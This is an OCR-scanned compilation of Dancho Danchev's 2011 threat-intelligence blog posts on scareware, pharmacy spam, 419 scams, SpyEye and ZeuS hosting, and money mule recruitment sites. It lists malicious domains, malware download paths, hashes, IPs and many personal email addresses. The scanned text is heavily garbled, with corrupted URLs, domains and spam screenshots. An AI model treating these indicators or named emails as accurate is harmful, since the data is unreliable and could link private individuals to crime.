nsl.dnsorbi.com 

115.239.229.196 

nsl.dnsroomo.ru 

115.239.229.196 

nsl.dnswork.ru 

115.239.229.196 

nsl.doctorci.ru 

115.239.229.196 

nsl.doctorngee.ru 

115.239.229.196 

nsl.doctorude.ru 

115.239.229.196 

nsl.eagreadns.ru 

115.239.229.196 

nsl.elmendns.ru 

115.239.229.196 

nsl.gurndns.ru 

115.239.229.196 

nsl.sighost.ru 

115.239.229.196 

nsl.twdoctor.com 

115.239,229.196 

nsl.vodoctorx.ru 

115.239.229.196 

nsl.advidns.ru 

113.23.142.119 

ns 1. bestworlddns. com 

113.23.142.119 

nsl.boxdns.ru 

113.23.142.119 

nsl.cashdns.ru 

113.23.142.119 

nsl.comtdns.com 

113.23.142.119 

nsl.crouadns.ru 

113.23.142.119 

nsl.culldns.com 

113.23.142.119 

nsl.dns4work.ru 

113.23.142.119 

nsl.glisdns.com 

113.23.142.119 

nsl.subrdns.ru 

113.23.142.119 

nsl.tiodns.com 

113.23.142.119 

nsl.annudns.com 

78.46.105.205 

nsl.botedns.com 

78.46.105.205 

nsl.caulsdns.com 

78.46.105.205 

nsl.dnsbestfind.com 

78.46.105.205 

nsl.dnsoper.com 

78.46.105.205 

nsl.psidns.com 

78.46.105.205 


repillso.ru - Email: aiexeycheremisinov@yahoo.com 
sipillsw.ru - Email: nikitapetuhov@yahoo.com 
stapiilso.ru - Email: alexeycheremisinov@yahoo.com 
supiiisp.ru - Email: muzalevskayaekaterina@yahoo.com 
tilpillso.ru - Email: alexeycheremisinov@yahoo.com 
tilpillsw.ru - Email: nikitapetuhov@yahoo.com 



towpillsp.ru - Email: muzalevskayaekaterina@yahoo.com 

trpillsp.ru - Email: muzaievskayaekaterina@yahoo.com 

uncpillso.ru - Email: alexeycheremisinov@yahoo.com 

vipillsp.ru - Email: muzalevskayaekaterina@yahoo.com 

whapiiisw.ru - Email: nikitapetuhov@yahoo.com 

Name servers of notice, respoding to 115.239.229.196 
(A54134); 113.23.142.119 (AS38182) and 78.46.105.205 

(AS24940 - active [5]SpyEye C &Cs at 

www.privathosting.eu; spl.privathosting. eu) 

nsl.advidns. ru 
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nsl.alemedicp. ru 

nsl.annudns.com 

nsl.bacdns.ru 

nsl. bacmedicp. ru 

nsl. bestworlddns. com 

nsl. botedns. com 

nsl.boxdns.ru 

nsl.camdns.ru 

nsl. cashdns. ru 


nsl.ca ulsdns. com 



nsl. com tdns. com 


nsl. crouadns. ru 
nsl. culldns. com 
nsl. delmedicv. ru 
nsl. dns4 work, ru 
nsl. dnsbest. ru 
nsl. dnsbestfind. com 
nsl. dnsoper. com 
nsl. dnsorbi. com 
nsl. dnsroomo. ru 
nsl. dns work, ru 
nsl. doctorci. ru 
nsl. doctorngee. ru 
nsl. doctorrfix. com 
nsl. doctorude. ru 
nsl. doctorxst. ru 
nsl. doctorxve. ru 
nsl. drdoctorx. ru 
nsl. dromedicp. ru 
nsl. eagreadns. ru 



nsl. elmendns. ru 


nsl.feldns.ru 
nsl. g Usdns. com 
nsl.gurndns.ru 
nsl.hardns.ru 
nsl .psidns. com 
nsl. rxshopsmor. ru 
nsl.sighost. ru 
nsl.standns.com 
nsl.subrdns.ru 
nsl. tiodns. com 
nsl. twdoctor, com 
nsl. vodoctorx. ru 

This post has been reproduced from [6]Dancho Danchev's 
blog. 

1. httos://zeustracker.abuse, ch/monitor. oh o?as=4134 

2. httD://www.zdnet.com/bloa/securitv/inside-an-affiliate- 
S Dam-Droaram-for-Dharmaceuticals/2054 

3. httD://www.zdnet.com/bloa/securitv/survev-millions-of- 
users-ODen-spam-emails-clicl<-on-linl<s/5889 

















4. httD://www.zdnet.com/bloa/securitv/microsofts-bin a- 
in vaded-b v- pharmaceutical-scammers/3993 
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5. httos:// s d ve vetracker.abuse, ch/monitor. oh o?as=24940 

6. htto://ddanchev.blo as oot. com/ 
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A Diverse Portfolio of Fake Security Software - Part 
Twenty Five (2011-02-15 16:06) 

Sea re were continues occupying the top spots for malicious 
monetization tactics courtesy of the cybercrime ecosys¬ 
tem. Disruption of this monetization chain can take place 
through multiple processes. For instance: 

• Share data with the affected ISP whose customers 
participate in the black hat SEO campaign 

• Target the payment processing gateways, or inform the 
legitimate one 

• Target the the redirector URLs of the campaign 

• Target the affiliate network itself 

• Target the "final output" in the form of sea re ware domains 

In this we'll expose a portfolio of sea ware domains, and will 
target the "final output" of the campaign, in between 
sharing data with community members. As always, what 
originally looks like a low profile campaign, always turns 












into a piece of puzzle from the massive blackhat 5E0 
"picture". 

- Detecrion rate for systemwrecksavertingsystem.com 
/scanl/92/freesystemscan. exe 

[ljfreesystemscan.exe - Trojan.Win32.FakeAV 

659 

E 

Result: 17/43 (39.5 %) 

MD5 : a69a7fl992ed4607ac0al63d66984f56 
SHA1 : ef089f92881ff6835b76562febdcbc3328340adb 

SHA256: 

993026853e2bbc8846dbda5a90c4f06a9al8b83c9f97fe7bl 

557b03975ebeaff 

- Detection rate for pornhugevideo.com 
7video3/88/free videoplugin, exe 

[2Jfreevideoplugin.exe - Rogue:Win32/FakePAV 

Result: 4/42 (9.5 %) 

MD5 : 8a688d6ebb838f66fl6720f4066cf6c6 

SHA1 : 845e43ad946048346b3d9150ae41fd8f7766ac53 

SHA256: 

db 6e3e 7 a 72305d8b36861 ed90753555d519bdca5a36aa 058 
1 ed363ac264cfbce 


Responding to 94.23.105.248 (AS16276): One active 
[3]Zeu5 C &C within the AS monastehodeboltana.es 

accidentspreventingcenter.com - Email: 
contact@privacyprotect. org 

antibreakingsystem.com - Email: 
contact@privacyprotect. org 

antivirusesshieid.com - Email: 
contact@privacyprotect. org 

bigvideocams.com - Email: contact@privacyprotect.org 
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componentsprotector.com - Email: 
contact@privacyprotect. org 

hugebigpornmovie.com - Email: 
contact@privacyprotect. org 

hugebigred.com - Email: contact@privacyprotect.org 

hugemoviecams.com - Email: contact@privacyprotect.org 

pcactivitydebugger.com - Email: 
contact@privacyprotect. org 

pcautomaticproblemssolver.com - Email: 
contact@privacyprotect. org 

pccustodianutiiity.com - Email: 
contact@privacyprotect. org 

pcinspectionutility.com - Email: 
contact@privacyprotect. org 



pcprecautionscenter.com - Email: 
contact@privacyprotect. org 

pcprotectionservant.com - Email: 
contact@privacyprotect. org 

pcriskspreventionscenter.com - Email: 
contact@privacyprotect. org 

pcstabilitymaximizer.com - Email: 
contact@privacyprotect. org 

pctroubiessoiver.com - Email: 
contact@privacyprotect. org 

pcwardingsystem.com - Email: 
contact@privacyprotect. org 

pornhugevideo.com - Email: contact@privacyprotect.org 

systemanticrashesutiiity.com - Email: 
contact@privacyprotect. org 

systemattentionutiiity.com - Email: 
contact@privacyprotect. org 

systemshieldingutiiity.com - Email: 
contact@privacyprotect. org 

systemsupervisioncenter.com - Email: 
contact@privacyprotect. org 

systemtasksoptimizer.com - Email: 
contact@privacyprotect. org 

systemwrecksavertingsystem.com - Email: 
contact@privacyprotect. org 



taskstweakingutHity.com - Email: 
contact@privacyprotect. org 

tubemovievideo.com - Email: contact@privacyprotect.org 
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morlunaya.vv.ee 

64.64.3.125 

f23f21fafae.vv.ee 

64.64.3.125 

oghmalak.vv.ee 

64.64.3.125 

oijqujnnnsul.eo.ee 

76.76.117.101 

gewheheh4, co.cc 

76.76.117.101 

hdfh34hdrfhf.co.cc 

76.76.117.101 

hdfg43hshf.co.cc 

76.76.117.101 

gsg3gsdgseg.co.cc 

76.76.117.101 

hh3hfdnfdh.co.cc 

76.76.117.101 

gsdg43hsweh.co.cc 

76.76.117.101 

212156dnfgdn.co.cc 

76.76.117.101 

gdezdeskto.eo.ee 

76.76.117.101 

gfsdg4gs.co.cc 

76.76.117.101 

drelagda.vv.ee 

76.76.117.101 

maridora.vv.ee 

76.76.117.101 

bfbf3bfb.vv.ee 

76.76.117.101 

fdf2fafaf.vv.ee 

76.76.117.101 

bdf nf ebne3nf .vv.ee 

76.76.117.101 

hndfdfnfdnxdnf.vv.ee 

76.76.117.101 

wefge3gltglg.vv.ee 

76.76.117.101 

gsgweg weg23g .vv.ee 

76.76.117.101 

gsegf3gstg3g.vv.ee 

76.76.117.101 

32fdsg3gsg.vv.ee 

76.76.117.101 

vsegwgewg.vv.ee 

76.76.117.101 

hdhfdhdfhdfhdfh.vv.ee 

76.76.117.101 

hu587tiugi.vv.ee 

76.76.117.101 

y ery eshsdhdh jf dhj .vv.ee 

76.76.117.101 

nvmtymvm.vv.ee 

76.76.117.101 

gsdg24gshgr.vv.ee 

76.76.117.101 

gsgsv2vds.vv.ee 

76.76.117.101 

gdsg342gsgs.vv.ee 

76.76.117.101 

ht4hdfgjcjgt.vv.cc 

76.76.117.101 

shalillador.ez.ee 

76.76.117.101 

malakelv.ez.ee 

76.76.117.101 


Responding to 76.76.117.101 (A521793); 78.46.105.205 
(AS24940); 207.58.177.96 (A525847) and 64.64.3.125 


(A525847) 



212156dnfgdn.co.cc - Email: audiodius@hotmail.com 

32fdsg3gsg. vv.cc 
androlhala. cz. cc 
bdfnfebne3nf. vv.cc 
bfbf3bfb. vv.cc 
cebandis. cz. cc 
centrihelm. cz. cc 
drelagda. vv. cc 
f23f21 fafae. vv. cc 
fdf2fafaf. vv.cc 
gdezdeskto. co. cc 
gdsg342gsgs. vv. cc 

gewheheh4.co.cc - Email: audiodius@hotmail.com 
gfsdg4gs.co.cc - Email: audiodius@hotmail.com 

gran in is. cz. cc 
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gsdg24gshgr. vv. cc 

gsdg43hsweh.co.cc - Email: audiodius@hotmail.com 

gsegf3gstg3g. vv.cc 

gsg3gsdgseg.co.cc - Email: audiodius@hotmail.com 



gsgs v2 vds. vv. cc 
gsg weg weg23g. vv. cc 

hdfg43hshf.co.cc - Email: audiodius@hotmail.com 
hdfh34hdrfhf.co.cc - Email: audiodius@hotmaii.com 

hdhfdhdfhdfhdfh. vv.cc 

hfehe3hdfhf.co.cc - Email: audiodius@hotmail.com 
hh3hfdnfdh.co.cc - Email: audiodius@hotmail.com 

hndfdfnfdnxdnf. vv.cc 
ht4hdfgjcjgt. vv.cc 
hu587tiugi. vv.cc 
malakelv. cz. cc 
maridora. vv. cc 
morlunaya. vv.cc 
n vmtym vm. vv. cc 
oghmalak. vv. cc 

oijqujnnnsul.co.cc - Email: audiodius@hotmail.com 

shalillador. cz. cc 
vs eg wge wg. vv. cc 
wefge3gl tgl g. vv. cc 
yeryeshsdhdhjfdhj. vv.cc 
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Bogus Adult Content SPIM-ed Over ICQ (2011-02-16 
13:25) 


A currently SPIM-ed campaign over ICQ attempts to trick the 
end user into becoming a member of a bogus adult 

content offering network, which drives sales through 
spamming. 
































The links chain: 


- ow.ly/3V9eu 

- art-spectrum.info/load2/7674/foto.jar - 178.170.250.12 
(AS52000, ALDAN-3-AS LTD 'ALDAN-3) 

- video-girl.tv/default.aspx - 81.177.3.250 - Email: 
support@video-peopie.com (A58342, RTCOMM-AS OJSC RT- 

Comm.RU) with two active [l]5pyEye C &Cs within the AS - 

googlemaps4.com (81.176.236.177) and reg.kygaiu.ru - 

81.177.32.45 - Email: kygalu.ru@r01-service.ru 

- Responding to 178.170.250.12 are also geoinvest.org 
(178.170.250.12) Email: geoinvest@sum.co.ru and power- 
man. ru (178.170.250.12) Email: antonvp@yandex.ru 
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- Responding to 81.177.3.250 are: 
vchat.kladoffka.com - Email: sanny_dbroker@mail.ru 
virtualniyseks.in - Email: sereg@hot.ee 
odetih.net - Email: reg@legato.name 

pornoton.net 
russiansgiris. net 

videodevki.ru - Email: prezidentbush@yandex.ru 
video-giri.ru - Email: admin@video-girl.ru 
strip-girl.ru - Email: kinoman-cd@yandex.ru 
webcam-girls.ru - Email: srg _surgut@pisem.net 
videoshowgirls.ru - Email: gbgcnbr@i.ua 
sexy-chat.ru - Email: roman.alexsandr@mail.ru 
flirtshow.ru - Email: rusproject99@yandex.ru 
chatsexy.ru - Email: roman.alexsandr@mail.ru 
rusprivate.su - Email: sadko-as@rambler.ru 
video-girl.tv - Email: support@video-people.com 
x-chat.tv - Email: x-chat@mail.ru 

This post has been reproduced from [2]Dancho Danchev's 
blog. 

1. https:// s d ve vetracker.abuse, ch/monitor. oh o ?as=8342 





2. htto.V/ddanchev.blo as oot.com/ 
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NOTICE 

• 419 MAILS 

• SPAM E-MAILS 

• e-mail extractors 
arty NOT ALLOWED 


Sampling 419 Advance Fee Scams Activity - Part Two 
(2011-02-21 13:54) 

Part two of the [IJSampling 419 Advance Fee Scams 
Activity series, once again aims to provide actionable real¬ 
time threat intelligence on a fraudulent segment that 
continues tricking hundreds of thousands of average Internet 
users into thinking that they have pending payments, have 
won the lottery, or someone is basically interested in doing 

multi-million dollar business with them. 

The format of the data obtained over the past 24 hours, is 
return email plus the original IP of the sender, 

most of which can be geolocated to African countries. 








hsuehyun@ncut.edu.tw - 116.206.139.254 
peterjohnson299@yahoo.co.jp - 41.218.232.158 
ekwesa@aol.com - 41.138.164.52 
info.hsbcbanktransfer@gmail.com - 41.218.251.239 
5arinaJensB@web.de - 77.70.128.160 
paulmohammed37@yahoo.com - 41.155.81.129 
henriondaniellepaulette@yahoo.fr - 81.91.228.78 
mainstreamfirm001@gmail.com - 41.155.72.26 
wilson201105@hotmail.com - 187.16.224.70 
westernun888union@hotmail.com - 41.191.85.209 
bt.telecomsgroup@live.co.uk - 202.137.234.123 
eco.bankplc.ecobankpl@gmail.com - 41.216.50.26 
kwameowus@aol.com - 41.218.233.50 
richardjsphs@yahoo.co.jp - 190.213.185.93 
mainstreamfirm001@gmail.com - 212.76.68.39 
benardodigor@yahoo.com - 41.211.229.23 
groupbanofafrica@hotmail.com - 189.86.87.204 
wellcometrustloans@post.com - 182.63.1.192 
Iindominic04@rediffmail.com - 41.28.113.153 
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rep Jeonbecker@yahoo.cn - 41.218.197.240 
agwa James@yahoo.it - 82.128.1.217 
mrsmarriogloria@yahoo.co.jp - 41.66.8.132 
raiphkoon@yahoo.co.jp - 124.120.130.145 
directorofremittance.centraiba@gmaii.com - 89.221.175.11 
Iegalclaimsdepartment2@lankaemail.com - 41.58.67.161 
drbbs@live.com - 111.172.36.231 
pn2812768@gmaii.com - 77.246.67.82 
husainali40@gmail.com - 212.52.152.113 
bensonibori@yahoo.com.hk - 82.128.36.25 
mraabull@att.net - 41.210.43.36 
info@westernu.co.uk - 199.255.209.74 
claim _ dptupdate@live. com - 82.128.88.173 
aihussein.raisin@yahoo.co.nz - 86.97.120.18 
adrianyrann5@att.net - 70.39.119.122 
dr Jarry_westl970@qatar.io - 41.222.192.89 
mrgarypalmercode@gmail.com - 41.71.147.248 
diplomaticericb78@globomail.com - 81.91.230.137 
treasuryoffice@cantv.net - 41.0.52.62 
infounl9@oued.org - 41.189.2.105 



fbi_54327@hotmail.com - 82.128.109.76 
s.b.mail@web.de - 74.115.3.69 
maria200495@hotmail.com - 115.132.173.171 
ceckamokai@gmail.com - 41.241.148.81 
ffl23ff69@yahoo.co.nz- 75.126.137.6 
mr.colesify@yahoo.co.uk - 115.118.239.95 
benkofi003@aol.com - 41.218.239.140 
investigationcommite2011@gmail.com - 41.211.229.26 
wiesner.heiko@web.de - 41.138.167.198 
kwameowus@aol.com - 41.218.245.220 
kamaruddinabdullah@w.cn - 120.141.67.94 
benobiego@rediffmail.com - 67.247.201.204 
See also: 

• [2]419 scammers using Dilbert.com 

• [3J419 scammers using NYTimes.com 'email this 
feature 

• [4]Protection tips for the upcoming FIFA World Cup 
themed cybercrime campaigns 

Historical OSINT remains an inseparable part of the 
CYBERINT gathering practices, hence the continuation of the 

Sampling 419 Advance Fee Scams Activity series. 



This post has been reproduced from [5]Dancho 
Danchev's blog. Follow him [6]on Twitter. 

1. htto.V/ddanchev.blo as oot.com/2010/06/samDlina-419- 
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2. htto://www.zdnet.com/bloa/securitv/419-scammers-usin a- 
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3. http://www.zdnet.com/bioa/securitv/419-scammers-usin a- 
n vtimescom-emaU-this-feature/3491 
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4. httD://www.zdnet.com/bloa/securit v/ orotection-tios-for-the- 
U DComina-fifa-world-cuD-themed-cvbercrime-cam o 

a i ans/6610 

5. htto://ddanchev.blo as oot.com/ 

6. htto://twitter.com/danchodanchev 
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Researchers spot new Mac OS X malware 

Secvrtv researchers from Sophos hare spotted a new piece of mjfrw are 
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ZeuS crimeware variant targets Symbian and 
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Summarizing Zero Day's Posts for February (2011-02- 
28 15:59) 


[ 1 ] 






The following is a brief summary of all of my posts at 
ZDNet's Zero Day for February You can subscribe to my 

[2]personal RSS feed, [3]Zero Day's main feed, or 

follow me on Twitter: 

[4] 

Recommend reading: 
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• [5]500,000 stolen email passwords discovered in Waledac's 
cache 

• [6]Report: AV users still get infected with malware 

• [7]Report: Patched vulnerabilities remain prime 
exploitation vector 

01. [8]Researcher demos SMS-based smartphone botnet 

02. [9]500,000 stolen email passwords discovered in 
Waledac's cache 

03. [1 OJStudy: US tops ZeuS hosting infrastructure chart 

04. [HJSpamvertised Xerox document themed malware 
campaign spreading 

05. [12]New report details the prices within the cybercrime 
market 

06. [13]Report: AV users still get infected with malware 

07. [14]Microsoft disables Auto Run on Windows XP/Vista to 
prevent malware infections 



08. [15]Google intros advanced sign-in feature 

09. [16]Malware Watch: UPS/FDIC; Mobile app; Infected 
ambulance dispatch 

10. [17]Report: Patched vulnerabilities remain prime 
exploitation vector 

11. [18]Bogus Android apps lead to malware 

12. [19]ZeuS crimeware variant targets Symbian and 
Black Berry users 

13. [20]Researchers spot new Mac OS X malware 

This post has been reproduced from [21]Dancho 
Danchev's blog. Follow him [22Jon Twitter. 

1. https://lh5. aooaieusercontent. com/-n- 
oZ7kPS XE/TWu d2Vd 4Hil/AAAAAAAAE 1 k/cvb- 
THEwfM/sl 600/ZDNet Zero Dav Fe 

bruarv 2011. ona 

2. htto://www.zdnet.com/tooics/dancho+danchev? 
o=l&mode=rss&ta o =mantle skin- . content 

3. http://feeds. feed burner, com/zdnet/securit v 

4. hftp://twitter.com/danchodanchev 

5. http://www.zdnet.com/bloa/securitv/50000Q-stolen-email- 
pass words-disco vered-in-waledacs-cache/8045 

6. http://www.zdnet.com/bloa/securitv/report-av-users-siJil 
aet-infected- with-malware/8108 
























7 . http://www.zdnet.com/bloa/securitv/report-oatched- 
vulnerabilities-remain-Drime-exDloitation-vector/8162 

8. http://www.zdnet.com/bloa/securitv/researcher-demos- 
sms-based-smartphone-botnet/8031 

9. http://www.zdnet.com/bloa/securitv/50000Q-stolen-email- 
pass words-disco vered-in-waledacs-cache/8045 

10. http://www.zdnet. com/bloa/securitv/studv-us-tops-zeus- 
hostina-infrastructure-chart/8064 

11. htto://www.zdnet. com/bloa/securit v/s pamvertised-xerox- 
document-themed-malware-campaian-SDreadina/8075 

12. http://www.zdnet.com/bloa/securitv/new-reoort-details- 
the-Drices-within-the-cvbercrime-market/8078 

13. http.V/www.zdnet.com/bloa/securitv/report-av-users-stiii- 
aet-infected- with-malware/8108 

14. http://www.zdnet. com/bloa/securitv/microsoft-disables- 
autorun-on-windows-xpvista-to-prevent-malware-infec 

tio ns/8123 

15. http://www.zdnet.com/bloa/securit v/ aooale-intros 
advanced-sian-in-feature/8137 

16. http://www.zdnet.com/bloa/securitv/malware-watch- 
u psfdic-mobile-a p p-infected-ambulance-dispatch/8151 

17. http://www.zdnet.com/bloa/securitv/report-patched- 
vulnerabilities-remain-orime-exploitation-vector/8162 

18. htto://www.zdnet. com/bloa/securitv/boaus-android-a oos- 
lead-to-malware/8212 









































































19. http.V/www.zdnet.com/bloa/securitv/zeus-crimeware- 
va riant- taraets-s vmbian-and-bla ckberrv-users/8231 


20. httD://www.zdnet.com/bloa/securitv/researchers-SDQt- 
new-mac-os-x-malware/8241 

21. http://ddanchev.blo as pot.com/ 

22. http://twitter.com/danchodanchev 
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Google health 

Viagra 

SALE: Viagra Levitra Cialis 

SALE: Viagra 10.80 per pill: Levitra $2.00 per pill; Cialis $1.30 per pill; 

Accept payments: Visa, MasterCard, Western Union, Money Gram, 

EuroDebit, Bank wire transfer. We have a special discount program for our 
customers! Please check our bonus options. 

http://www. qeneric-pills-online. eu/ 

Buy Viaara Now From & Get 10 bonus pills 

FREE! 

Viagra is the top brand to treat erectile dyslunction. Buy through a 
recommended online pharmacy to get efficient service at bargain prices. Bu 
generic Viagra online with confidence and security 

http://www. worldselectshop. com/ 

Buy Viaara. Cialis. Levitra - Cheap Generic 

Cialis Online Without Prescription 

Generic Cialis Gnline Pharmacy Buy Cialis online without a prescription. 10 
Free Viagra Pills. Grder cheap Cialis plus many other generic Cialis erectile 
dysfunction drugs. Lowest prices and Satisfaction Guaranteed 

http://www.canadianselect.net/ 

Generic VIAGRA 120 pills x IQOmg $137,95 

High quality Generic Viagra. 100% Satisfaction Guaranteed. Fast wordwide 
shipping. 10 Free Bonus Viagra Pills with your orderi Visa, MC, Amex 
accepted. 5-7% reorder discount on all orders. 

http://www.ukmenshealth.com 

Compromised University Leads to Fraudulent Google 
Brand-jacked Pharmaceutical Ads (2011-03-07 14:08) 

[11 

An 

exploited 

web 

application 












vulnerability 

within 

Cochise 

County 

Online 

University 

CMS 

(moo- 

dle.cochise.az.gov/user), is currently resulting in a 
biackhat SEO campaign (1,890 pages) leading to fraudulent 
Google brand-jacked pharmaceutical pages. 

Naturally, once the compromise took place, the 
cybercriminals started considering the biackhat SEO content 

farm themed for pharmaceutical scams, as parts of their 
infrastructure and spamvertised links to it across multiple 
web forums. 

[ 2 ] 
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Web 


Results 1 - 10 cd Shout 33.000,000 lor vlaqia [dthM(Qfl | (0^1 seconds) 


Viagra [S»V3enafil) IQQmg x 395 Fi i$ $312 • Plus Ree Sttpping 

Bo, Vtoijia (S«ena4f) 100mg Frcm our CA31A01AN Onlna Pturmjcy (Since 2X0) - No 
Pretcnplion Roquued ■ Plus Free Shaping 

www aUrilebs com • Cached Simitar 

c»afas tramadol vla ora v afcum 

ciebs lram»5oi vtegi.i val#-rr> 

prbsheettmedsplus net . Cached SmWir 


. i i^:., 

Pits <312 - Plus Ffftfr SfiiPPiQQ 

Vhvji.i 

CANAOtAN Onlne Phaimacy (Since 2303) • No 
Prescrplion Requred • Plus Free Shipping 

www atritabs com 


BcnrVtoaf Ciaiis L^yitra - O ^ aoG^r>noc Ci. ri ■ ; Offtno Wirhooi Prosrnation 

Generic Cabs Onlne Pharmacy Buy Ciahs orftne wttout a prescrplion 10 Free Viagra Pits 
Order cheap Ciahs plus many other genenc Ciahs ereclie dysfunction drugs Lowest pnees 
and Satisfaction Guaranteed 

*wv* <*ned*anselect net * C ached * Snnier 

Bw VUora Now Prom & Gat 10 bonus Dills PREE i 

Vi.iqia iv the lop brand lo Ireal erectle dysimehon Buy through a recommended ©rhn* 
pharmacy to get e*ciem semce at bergam pnees Buy genenc Viagra or*ne wth confidence 
and securey 

«mm wofidselectshop com • C ached • Sn-.la* 

SALE VUfln Levitra Ciaiis 

SALE Viagra $0 80 per pfi. Levtra $2 00 pet p*. Ciahs $1 30 per pi* Accept payments 
Visa. MasterCard. Western Onion. Money Gram. EiroOeM. Barb wire transfer We have a 
special discount program for our customers’ Please check our bonus options 

«mr genenc-pfiS'Onkne eu • Cached ■ Sim»‘-»r 


gaiis tramadol vlnof 

<>ahs ttamad^ vfagia valtum 

pdishealthmedspius net 


Buy Viagra, Gafts. Levitra • 

Cheap G«fienc Ciaiis Onbne Without 

PrescnpQon 

Genenc Ciaiis OnW Pharmacy Buy Ciahs onlne 
without a prescription 10 Free Viagia 
Prfli Order cheap Ciahs plus many other genenc 
Cults erect le dyshjnclion drugs Loe^st pnees 
and Satisfaction Guarar<eed 
www canadianseleci net 

P-if/ VifiOf a Ngw Prom & Get 10 

bonus oiNs FREE 1 


Ther redirection chain is as follows: 

- moodle.cochise.az.gov/user - random pharmaceutical 
content 

- goodmedk.com 

- gooqpilly.com 


50.22.28.50 


































































































goodmedk.com/whftltyixallwke6hoqstgzsiq.html - 

77.67.80.48, AS3257 - Email: jognbroownn@usa.com 

goodmedk. com/ka vglmapejes7bdfg6mf8d.py 
goodmedk. com/hxinlaresbnzbikmna tmck.py 
goodmedk. com7huvtleikspann6hoqstgzsiq.html 
goodmedk. com/txajla te v0egij9pi-g.pl 
goodmedk. com/tldhlaoet8cegh 7ng9e.html 
[3] 

Redirectors used: 
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Canadian 

Health&Care Mall 


ALL PRCOUCTS ABOUT IIS HOW TO ORDER TESTIMONIALS FAO CONTACTS 




S I ill n*-H 
tid— I riS 

“ »ecS£3 r .^T; 


Healthcare Online 


USP CM CAO CUR AU© CNR 


Most Popular Products 


Search |L-*«r prodLCS -wr» 


HI ITS HIA11M 


Maori 

Q* 

Migri Sa^tr AitMr 
Migri MiwmiI 
UvKn 

CubSvHrAitM* 
Maori Sup« forte 
Chita Soft lain 
Qata taofcMMAJl 
Maori Soft lain 
Rropcaa 


Viagra »t taw at SI 8S 

Gananc Viagra conlanng StatnaA C4rtf« an abltt 
actuate or twttan an #r»ct pant lor taw* actndy i 
bean the pnma treatment lor tract M dytAncben 


Cialit at low a* SI 75 
Cuba •* a tagtay ttactne craty a dmit tttred 
commonly known at mpotmeo Racorrmer* 
a* a dely med«c*t»cn 


j enclta dyiAmclon mora 
waded Cuba can alto be uted 


lADMIBl 

Soma 

Tramadol 


ANTIBIO IKS 
IH hromix 


Viagra Super Active* at low at J2 79 


Cation o< a « 
recreated 


Viagra Prole taianal at taw at S3.BS 

Viagra Pro4tt*onai it a ctac Ay te*t*d tnhancad freverpton drug trted to treat a 
dAculm Aclnabng «ha nafwral blood *o* I prpndet tuttaned erection accatari 
recovery Irom poor temaf rtatowir mereated ttamaia and iMo and poyettota; 
ccrddanca Safa and edtctne Viagra Prttaiucrta promolai pant ertcion only m 
ratpenta to texual otmUaben 


WOMaHSMIAI Til 
fam a la Pta Viagra 



Lav tv a at taw at S2.B0 

le*ra n a now FDA approved ord praten 
dydactan (EOj n man 


gooqpilly.com - 77.67.80.42, AS3257 - Email: 
jognbroownn@usa. com 

50.22.28.50/c.php 50.22.28.50- 
static. re verse, softlayer. com 

[4] 

Redirects to the following currently active fraudulent online 
pharmacies: 

pillshealthmedsplus.net - 89.114.9.82 - Email: 
acquit@bz3.ru 






allrxtabs.com - 91.212.135.69 - Email: 
rxrevenue@gmail. com 

canadianselect.net - 89.149.196.197 - Email: 
canadianselect. net@protecteddomainservices. com 

worldselectshop. com - 95.211.1.82 - Email: 
worldselectshop. com@protecteddoma inservices, com 

generic-pilis-oniine.eu - 95.163.15.207 

menhealth-pharmacy.co.uk - 109.237.213.194 

4rx.com - 174.127.67.233 - Email: webmaster@4rx.com 

The hijacking of a trusted brand such as Google shouldn't be 
surprising, as it's an inseparable part of social engineering 
driven abuse of the trust-chain. From Google's name to the 
visual impersonation of Google Search this 

campaign demonstrates exactly the same. 

This post has been reproduced from [5]Dancho 
Danchev's blog. Follow him [6]on Twitter. 

1. httos://lh5. aooaleusercontent. com/- 
FaZm5Nia4mo/TXTAssw6EUI/AAAAAAAAElo/8G- 

6ee31FHI/sl600/Gooale Health oha 

rmaceutical. PNG 
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2. httos://lh4. aooaleusercontent. com/-YP4- 
k lDOSwi/TXTGUUOvl KI/AAAAAAAAEls/fvkF9Q5 waTM/sl 600/F 
ake Gooale Healt 


h pharmaceutical soamvertised links.PNG 



















3 . 

https://lh5. aooaleusercontent. com/-4DvwYszzZ vA/TXTHkIXIf 
OI/AAAAAAAAE1 w/UA2AKPC8CM8/sl 600/Fake Goo c tle Healt 

h pharmaceutical. PNG 

4. https://lh5. aooaleusercontent. com/- 

BPztch9a4Tc/TXTIIo2eCII/AAAAAAAAEl 0/kX4URWeZDmk/sl 6 
OO/fraudulent pharma 

ceutical.PNG 

5. http://ddanchev.blo as pot.com/ 

6. http://twitter.com/danchodanchev 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Six (2011-03-10 14:45) 

[ 1 ] 

Following my previous post on "[2]Keeping Money Mule 
Recruiters on a Short Leash - Part Five", in this post 
we're once again going to expose a portfolio of money mule 
recruitment domains, their related ASs and name servers of 

notice, including some additional Spy Eye activity within one 
of the ASs. 

What's particularly interesting is the ongoing use of similar 
templates, including fake "certified by" documents aiming to 









boost the visitor's confidence in the mule recruitment 
company. Sam pie "certified by" documents include: 678 




Selling IBM cxrvcr xScrics 
infatsinKiutc Solution* 

twoimuiM 

Hnvatch Investments Inc. 













s 


Most Promising 
New Bus ness 


Hiwatch Investments Inc. 


In|h «l DM MiaM* ft Ww (m 
W> »«i > 0 Ct«wn» ft mftoirt 


Highly Commended 
ixO 


BT^ 


[3] 

[4] 

[5] 

[ 6 ] 
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[7] 

Money mule recruitment web sites: 

ACOON-GROUPLLC.CC - Email: bombay@yourisp.ru - 

[8] seen here 













ANTIQUEE-CORP.INFO - Email: admin@antiquee-corp.info 

ARAMATEGROUP-INT.INFO - Email: admin@aramategroup- 
int.info 

art-marketllc.cc - Email: hear@ppmail.ru 

ARTSOLVE-LTD.AT - Email: admin@artsolve-ltd.at 

ARTSOLVELTD.CC - Email: admin@artsolveltd.ee 

artsolveltd.ee - Email: admin@artsolveltd.ee 

ARTSOLVELTDCO.AT - Email: admin@artsolveltd.ee 

artsolveltdco.at - Email: admin@artsolveltd.ee 

ASTECH-CROUPDE.CC - Email: admin@i-compass-group.cc 

atlant-groupine.ee - Email: bombay@yourisp.ru - [9]seen 
here 

Atlant-usainc.net - Email: admin@atlant-usainc.net 

BREDCARCORP-ANT.BE 

CREATENCE-GROUPLLC.AT - Email: admin@creatence- 
groupllc.at 

CREATENCE-CROUPLLC.CC - Email: hunt@bz3.ru 

CREATENCEGROUP-LLC.CO - Email: px@bz3.ru 

DEVAS-LLC.CO - Email: gate@ppmail.ru 

DRYSDALE-ANTCORP.AT - Email: admin@drysdale- 
antcorp.at 



DRYSDALE-ANTCORP.BIZ - Email: admin@drysdale- 
antcorp.biz 

